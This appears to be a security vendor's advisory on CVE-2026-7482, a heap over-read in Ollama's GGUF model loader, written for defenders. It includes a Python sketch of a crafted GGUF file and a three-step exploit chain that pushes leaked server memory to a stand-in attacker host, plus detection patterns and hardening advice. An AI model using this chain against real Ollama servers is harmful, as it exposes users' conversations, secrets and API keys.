By Lyrie Threat Intelligence·5/11/2026

Bleeding Llama: The Memory Leak That Exposes Your AI Infrastructure

TL;DR

A critical out-of-bounds heap read vulnerability (CVE-2026-7482, CVSS 9.1) in Ollama allows unauthenticated remote attackers to leak the entire process memory of an Ollama server with just three API calls. The vulnerability, dubbed "Bleeding Llama," impacts 300,000+ exposed Ollama instances globally and potentially exposes API keys, user conversation data, system prompts, and environment variables.

What Happened

Cyera researchers disclosed CVE-2026-7482 in Ollama, the open-source platform with 170,000+ GitHub stars and 100M+ Docker Hub downloads that allows organizations to run LLMs locally instead of relying on cloud services. The vulnerability was reported to Ollama in early February 2026, and although a fix shipped that same month, it went undisclosed for nearly three months. With no explicit security advisory attached to the fix, most users remain unaware of the urgency.

The vulnerability exists in Ollama's GGUF model loader, a critical pathway for creating custom model instances via the /api/create endpoint. When users upload GGUF files (the standard binary format for storing LLMs) to an exposed Ollama server, an attacker can craft a malicious GGUF file with inflated tensor metadata to trigger an out-of-bounds heap read during quantization—the process of converting model precision to reduce size and latency.
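As a rough illustration of such a crafted file, the sketch below emits a GGUF-style header (following the public GGUF v3 layout, heavily abbreviated: real files carry metadata key/value pairs that a loader may require) whose single tensor claims one million F16 elements, about 2 MB, while the file itself is well under 200 bytes:

```python
import struct

def build_malicious_gguf_sketch(claimed_elements=1_000_000, actual_bytes=64):
    """Illustrative only: a GGUF-like header whose tensor shape claims far
    more elements than the payload actually contains."""
    buf = b"GGUF"                               # magic
    buf += struct.pack("<I", 3)                 # format version
    buf += struct.pack("<Q", 1)                 # tensor count
    buf += struct.pack("<Q", 0)                 # metadata key/value count
    name = b"tensor_0"
    buf += struct.pack("<Q", len(name)) + name  # tensor name
    buf += struct.pack("<I", 1)                 # number of dimensions
    buf += struct.pack("<Q", claimed_elements)  # inflated shape: 1M elements
    buf += struct.pack("<I", 1)                 # dtype id (F16 in GGUF)
    buf += struct.pack("<Q", 0)                 # tensor data offset
    buf += b"\x00" * actual_bytes               # far less data than claimed
    return buf

blob = build_malicious_gguf_sketch()
# A 1M-element F16 tensor should occupy 2 MB of data; this file is 128 bytes.
```

A parser that trusts the shape field will compute a 2 MB read over a 64-byte payload.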

On May 2, 2026, Cyera published a detailed technical breakdown, and within two days researcher alerts spread across the security community. Ollama had shipped the fix in version 0.17.1 back in February, but without a security flag in the release notes, organizations missed the urgency. Unpatched, internet-exposed Ollama servers remain vulnerable.

Technical Details

The Exploit Chain

The attack unfolds in three steps and requires zero authentication:

1. Upload a crafted GGUF file to the target Ollama server using the /api/blobs/sha256:[hash] endpoint. The file's tensor shape metadata is set to an unrealistically large number (e.g., 1 million elements) while the actual data is minimal.

2. Trigger the out-of-bounds read by calling /api/create with the malicious GGUF and a model name set to an attacker-controlled domain (e.g., http://attacker-server.com/namespace/model:tag). Ollama processes the file and begins quantization.

3. Exfiltrate the leaked memory using /api/push to upload the resulting model file (now containing unallocated heap data) directly to the attacker's server.
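The three calls above can be sketched as request payloads. The endpoint paths come from the write-up; the JSON field names ("model", "files") are assumptions about Ollama's create API, and no request is actually sent:

```python
import hashlib

# Illustrative reconstruction of the three-call chain described above.
gguf_blob = b"..."  # the crafted GGUF file from step 1
digest = hashlib.sha256(gguf_blob).hexdigest()

steps = [
    # 1. Upload the blob; Ollama addresses blobs by their SHA-256 digest.
    ("POST", f"/api/blobs/sha256:{digest}", gguf_blob),
    # 2. Create a model from the blob; the attacker-controlled registry name
    #    in "model" tells Ollama where the model "lives".
    ("POST", "/api/create", {
        "model": "attacker-server.com/namespace/model:tag",
        "files": {"model.gguf": f"sha256:{digest}"},
    }),
    # 3. Push the (now heap-tainted) model out to that registry.
    ("POST", "/api/push",
     {"model": "attacker-server.com/namespace/model:tag"}),
]
```

None of the three requests carries credentials; the default install accepts them all.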

Why It Works

The vulnerability stems from Ollama's use of Go's unsafe package, a low-level memory manipulation tool that bypasses Go's safety guarantees. During tensor quantization, the WriteTo() function calls ConvertToF32() with a tensor element count derived from the shape metadata, and nothing validates that this count matches the actual buffer size. When the conversion loop reads past the allocated buffer, it collects whatever happens to be adjacent in the heap.
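A minimal sketch of the vulnerable pattern, in Python for illustration (Python raises on an over-read where Go's unsafe code silently reads adjacent heap memory instead); the length check is roughly the validation the fix adds:

```python
import struct

def convert_f16_to_f32(buf: bytes, claimed_elements: int) -> bytes:
    """Sketch of the bug class: an element count taken from metadata
    instead of from the buffer that actually backs the tensor."""
    # The missing check, roughly what the patched version enforces:
    if claimed_elements * 2 > len(buf):          # F16 = 2 bytes per element
        raise ValueError("tensor shape exceeds actual data size")
    # "e" is half-precision, "f" is single-precision in the struct module.
    halves = struct.unpack(f"<{claimed_elements}e", buf[:claimed_elements * 2])
    return struct.pack(f"<{claimed_elements}f", *halves)
```

Without the guard, a claimed_elements of one million against a 64-byte buffer turns the conversion loop into a 2 MB heap read.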

The researchers used a clever lossless conversion trick: set the source format to F16 (16-bit float) and the target format to F32 (32-bit float). Because every F16 value converts exactly to an F32 value, the operation doubles the data size without any precision loss, so the leaked heap bytes survive quantization intact and recoverable.
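The losslessness is easy to verify with Python's struct module, which supports half-precision via the "e" format:

```python
import struct

# Every finite F16 value has an exact F32 representation, so converting
# "up" doubles the byte count without altering any value.
vals = [1.5, -0.125, 65504.0, 6.103515625e-05]  # incl. F16 max / min normal
f16 = struct.pack(f"<{len(vals)}e", *vals)
f32 = struct.pack(f"<{len(vals)}f", *vals)
assert len(f32) == 2 * len(f16)
assert struct.unpack(f"<{len(vals)}e", f16) == struct.unpack(f"<{len(vals)}f", f32)
```

A lossy target format (say, a 4-bit quantization) would have mangled the leaked bytes; F16-to-F32 preserves them.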

What's in the Heap

Cyera's proof-of-concept extracted:

  • User prompts and responses from concurrent Ollama sessions
  • System prompts from other models running on the same instance
  • Environment variables from the host machine (often containing API keys)
  • Internal configuration data

An enterprise with 10,000 employees using Ollama as an AI chat platform exposes all employee queries, proprietary analysis, customer data, and embedded secrets to a three-call, unauthenticated exploit chain.

Worse: if Ollama is connected to tool frameworks like Claude Code or similar autonomous agents, all tool outputs (code, API responses, technical designs) flow through the Ollama heap and become exfiltrable.

Lyrie Assessment

This vulnerability represents a fundamental architectural flaw in how Ollama ships: unauthenticated by default, listening on all interfaces (0.0.0.0), and with no memory-safety controls around binary format parsing.

Why CISOs should care:

1. The adoption problem: Ollama's ease of deployment means it's installed in enterprises without security review. Departments spin up instances to test open-source models and forget about them. Shodan and Censys show 300,000+ exposed instances—most in enterprises that don't know they exist.

2. The supply-chain angle: Organizations connecting Ollama to agent frameworks (Semantic Kernel, Anthropic's MCP, LangChain) are inadvertently creating credential exfiltration channels. A compromised Ollama heap becomes a pivot point into integrated tools, CI/CD systems, and cloud services.

3. The disclosure failure: Ollama acknowledged the flaw in February but released a fix without security flagging. This is a process failure that leaves the user community unprepared. Coordinated disclosure means nothing if the fix is shipped silently.

4. The unpatched Windows variants: Cyera also detailed two unpatched Windows-specific vulnerabilities (CVE-2026-42248, CVE-2026-42249) that chain auto-update mechanisms into persistent code execution. These remain unfixed in versions 0.12.10–0.22.0.

Lyrie's angle: As the autonomous defense platform, we focus on detecting unexpected heap-exfiltration patterns. Organizations running Ollama should monitor for:

  • Unusual /api/create calls with suspicious tensor metadata (shape values in millions)
  • /api/push requests routing to external domains
  • Spike in GGUF file uploads from untrusted sources
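A toy log-scanning sketch for the blob-upload, then create, then push sequence from a single client; the log format and regexes here are placeholders to adapt to whatever your gateway or front-proxy actually emits:

```python
import re

# Hypothetical access-log lines for illustration only.
LOG = [
    '10.0.0.5 "POST /api/blobs/sha256:ab12 HTTP/1.1" 201',
    '10.0.0.5 "POST /api/create HTTP/1.1" 200',
    '10.0.0.5 "POST /api/push HTTP/1.1" 200',
    '10.0.0.9 "POST /api/generate HTTP/1.1" 200',
]

# The three stages of the exploit chain, in order.
SUSPICIOUS = (r"/api/blobs/sha256:", r"/api/create", r"/api/push")

def flag_sources(lines):
    """Flag client IPs that hit blob-upload, create, and push in sequence."""
    stage = {}
    for line in lines:
        m = re.match(r'(\S+) "POST (\S+)', line)
        if not m:
            continue
        ip, path = m.groups()
        for i, pat in enumerate(SUSPICIOUS):
            # Advance this IP's stage only when stages arrive in order.
            if re.match(pat, path) and stage.get(ip, -1) == i - 1:
                stage[ip] = i
    return [ip for ip, s in stage.items() if s == len(SUSPICIOUS) - 1]
```

Real detection logic would also inspect uploaded GGUF tensor shapes and push destinations, but the sequencing alone is a strong signal.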

Recommended Actions

1. Audit network exposure: Use Shodan queries ("Ollama" "version") to identify your own exposed instances. Disable external access immediately if found.

2. Apply the fix now: Upgrade all Ollama instances to version 0.17.1 or later. This is non-negotiable for internet-facing or high-value deployments.

3. Isolate behind authentication: Deploy an API gateway (nginx, Cloudflare, AWS ALB) with API key or mTLS authentication in front of all Ollama instances. The REST API does not provide built-in auth.
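A minimal nginx sketch of that pattern; the header name, key, certificate paths, and hostname are all placeholders (Ollama's default listen port, 11434, is real), and mTLS is preferable to a static key where feasible:

```nginx
# Minimal sketch: nginx in front of Ollama, requiring a static API key.
server {
    listen 443 ssl;
    server_name ollama.internal.example.com;

    ssl_certificate     /etc/nginx/tls/ollama.crt;
    ssl_certificate_key /etc/nginx/tls/ollama.key;

    location / {
        # Reject any request lacking the expected key header.
        if ($http_x_api_key != "REPLACE_WITH_SECRET") {
            return 401;
        }
        proxy_pass http://127.0.0.1:11434;   # Ollama's default port
        proxy_set_header Host $host;
    }
}
```

Bind Ollama itself to 127.0.0.1 so the proxy is the only reachable path.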

4. Segment Ollama from sensitive infrastructure: If Ollama is connected to agent frameworks or tool integrations, isolate it on a separate network segment with egress filtering. Assume the heap is compromised.

5. Windows-specific: If running Ollama on Windows, disable automatic updates (AutoUpdateEnabled=false) and remove any Ollama shortcuts from the Windows Startup folder immediately.

6. Monitor for exploitation: Implement network monitoring for outbound HTTPS/HTTP connections from Ollama servers to unexpected domains. Baseline what's normal, alert on deviation.

7. Scan your threat intelligence: If you operate in a targeted sector (defense, finance, government), assume your Ollama instance was probed. Check logs for suspicious /api/create and /api/push patterns from the past 3+ months.

Sources

1. The Hacker News: Ollama Out-of-Bounds Read Vulnerability

2. Cyera Research: Bleeding Llama — Critical Memory Leak in Ollama

3. CVE-2026-7482 Official Record

4. Echo AI Security Advisory


Lyrie.ai Cyber Research Division

Lyrie Verdict

Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces, no signature update required.